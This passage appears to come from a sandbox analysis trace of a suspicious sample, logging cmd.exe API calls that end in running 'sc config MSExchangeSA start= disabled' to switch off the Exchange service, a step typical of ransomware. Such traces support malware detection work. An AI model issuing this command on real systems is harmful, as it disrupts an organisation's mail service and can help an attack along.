lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1fe9b0 | out: phkResult=0x1fe9b0*=0x94) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x0, lpData=0x1fe9bc*=0xf8, lpcbData=0x1fe9b8*=0x1000) returned 0x2 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x4, lpData=0x1fe9bc*=0x1, lpcbData=0x1fe9b8*=0x4) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x0, lpData=0x1fe9bc*=0x1, lpcbData=0x1fe9b8*=0x1000) returned 0x2 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x4, lpData=0x1fe9bc*=0x0, lpcbData=0x1fe9b8*=0x4) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x4, lpData=0x1fe9bc*=0x40, lpcbData=0x1fe9b8*=0x4) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x4, lpData=0x1fe9bc*=0x40, lpcbData=0x1fe9b8*=0x4) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x0, lpData=0x1fe9bc*=0x40, lpcbData=0x1fe9b8*=0x1000) returned 0x2 [0133.711] RegCloseKey (hKey=0x94) returned 0x0 [0133.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1fe9b0 | out: phkResult=0x1fe9b0*=0x94) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x0, lpData=0x1fe9bc*=0x40, lpcbData=0x1fe9b8*=0x1000) returned 0x2 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x4, lpData=0x1fe9bc*=0x1, lpcbData=0x1fe9b8*=0x4) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x0, lpData=0x1fe9bc*=0x1, lpcbData=0x1fe9b8*=0x1000) returned 0x2 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x4, lpData=0x1fe9bc*=0x0, lpcbData=0x1fe9b8*=0x4) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x4, lpData=0x1fe9bc*=0x9, lpcbData=0x1fe9b8*=0x4) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x4, lpData=0x1fe9bc*=0x9, lpcbData=0x1fe9b8*=0x4) returned 0x0 [0133.711] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1fe9b4, lpData=0x1fe9bc, lpcbData=0x1fe9b8*=0x1000 | out: lpType=0x1fe9b4*=0x0, lpData=0x1fe9bc*=0x9, lpcbData=0x1fe9b8*=0x1000) returned 0x2 [0133.711] RegCloseKey (hKey=0x94) returned 0x0 [0133.711] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29836 [0133.712] srand (_Seed=0x5ad29836) [0133.712] GetCommandLineW () returned="/c sc config MSExchangeSA start= disabled" [0133.712] GetCommandLineW () returned="/c sc config MSExchangeSA start= disabled" [0133.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.712] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4529ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0133.712] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0133.712] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.712] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.712] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.712] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.712] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.712] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.712] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.712] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.712] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.712] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.712] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.712] GetEnvironmentStringsW () returned 0x4527d90* [0133.712] FreeEnvironmentStringsA (penv="A") returned 1 [0133.712] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.712] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.712] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.712] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.712] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.712] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.712] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.712] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.712] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.712] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ff788 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.713] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x1ff788, lpFilePart=0x1ff780 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x1ff780*="Desktop") returned 0x1d [0133.713] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0133.713] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ff508 | out: lpFindFileData=0x1ff508) returned 0x45205c8 [0133.713] FindClose (in: hFindFile=0x45205c8 | out: hFindFile=0x45205c8) returned 1 [0133.713] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x1ff508 | out: lpFindFileData=0x1ff508) returned 0x45205c8 [0133.713] FindClose (in: hFindFile=0x45205c8 | out: hFindFile=0x45205c8) returned 1 [0133.713] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0133.713] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x1ff508 | out: lpFindFileData=0x1ff508) returned 0x45205c8 [0133.713] FindClose (in: hFindFile=0x45205c8 | out: hFindFile=0x45205c8) returned 1 [0133.713] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0133.713] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0133.713] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0133.713] GetEnvironmentStringsW () returned 0x4527d90* [0133.713] FreeEnvironmentStringsA (penv="=") returned 1 [0133.713] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.714] GetConsoleOutputCP () returned 0x1b5 [0133.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.714] GetUserDefaultLCID () returned 0x409 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ff8b8, cchData=128 | out: lpLCData="0") returned 2 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ff8b8, cchData=128 | out: lpLCData="0") returned 2 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ff8b8, cchData=128 | out: lpLCData="1") returned 2 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0133.714] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0133.714] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.715] GetConsoleTitleW (in: lpConsoleTitle=0x452aa30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.715] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0133.715] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0133.716] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0133.716] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0133.716] _wcsicmp (_String1="sc", _String2=")") returned 74 [0133.716] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0133.716] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0133.716] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0133.716] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0133.716] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0133.716] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0133.717] GetConsoleTitleW (in: lpConsoleTitle=0x1ff5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.717] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0133.717] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0133.717] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0133.717] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0133.717] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0133.717] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0133.717] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0133.717] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0133.717] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0133.717] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0133.717] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0133.717] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0133.717] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0133.717] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0133.717] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0133.717] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0133.717] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0133.717] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0133.717] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0133.718] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0133.718] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0133.718] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0133.718] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0133.718] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0133.718] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0133.718] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0133.718] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0133.718] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0133.718] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0133.718] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0133.718] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0133.718] _wcsicmp (_String1="sc", _String2="START") returned -17 [0133.718] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0133.718] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0133.718] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0133.718] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0133.718] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0133.718] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0133.718] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0133.718] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0133.718] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0133.718] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0133.718] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0133.718] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0133.718] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0133.718] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0133.718] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0133.718] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0133.718] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0133.718] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0133.718] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0133.718] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0133.718] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0133.718] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0133.718] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0133.718] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0133.718] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0133.718] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0133.718] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0133.718] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0133.718] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0133.718] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0133.718] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0133.718] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0133.718] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0133.718] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0133.718] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0133.718] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0133.718] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0133.718] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0133.718] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0133.718] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0133.718] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0133.718] _wcsicmp (_String1="sc", _String2="START") returned -17 [0133.718] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0133.718] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0133.719] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0133.719] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0133.719] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0133.719] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0133.719] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0133.719] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0133.719] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0133.719] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0133.719] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0133.719] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0133.719] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0133.719] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0133.719] SetErrorMode (uMode=0x0) returned 0x0 [0133.719] SetErrorMode (uMode=0x1) returned 0x0 [0133.719] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x45205d0, lpFilePart=0x1ff0ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x1ff0ac*="Desktop") returned 0x1d [0133.719] SetErrorMode (uMode=0x0) returned 0x1 [0133.719] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0133.719] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.727] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.727] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.727] GetConsoleTitleW (in: lpConsoleTitle=0x1ff32c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.727] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ff258, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ff23c | out: lpAttributeList=0x1ff258, lpSize=0x1ff23c) returned 1 [0133.727] UpdateProcThreadAttribute (in: lpAttributeList=0x1ff258, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ff244, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ff258, lpPreviousValue=0x0) returned 1 [0133.727] GetStartupInfoW (in: lpStartupInfo=0x1ff290 | out: lpStartupInfo=0x1ff290*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0133.727] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0133.728] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0133.728] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.729] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeSA start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x1ff1e0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeSA start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ff22c | out: lpCommandLine="sc config MSExchangeSA start= disabled", lpProcessInformation=0x1ff22c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd80, dwThreadId=0xd70)) returned 1 [0133.735] CloseHandle (hObject=0xa4) returned 1 [0133.735] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.735] GetEnvironmentStringsW () returned 0x4529ef8* [0133.735] FreeEnvironmentStringsA (penv="=") returned 1 [0133.735] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0133.784] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x1ff1c4 | out: lpExitCode=0x1ff1c4*=0x424) returned 1 [0133.784] CloseHandle (hObject=0xa8) returned 1 [0133.784] _vsnwprintf (in: _Buffer=0x1ff2ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ff1cc | out: _Buffer="00000424") returned 8 [0133.784] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0133.784] GetEnvironmentStringsW () returned 0x452b368* [0133.785] FreeEnvironmentStringsA (penv="=") returned 1 [0133.785] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.785] GetEnvironmentStringsW () returned 0x452b368* [0133.785] FreeEnvironmentStringsA (penv="=") returned 1 [0133.785] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ff258 | out: lpAttributeList=0x1ff258) [0133.785] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.785] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0133.785] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.785] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0133.785] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.785] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0133.785] SetConsoleInputExeNameW () returned 0x1 [0133.785] GetConsoleOutputCP () returned 0x1b5 [0133.786] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.786] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.786] exit (_Code=1060) Thread: id = 555 os_tid = 0xd78 Process: id = "171" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3d2d1000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 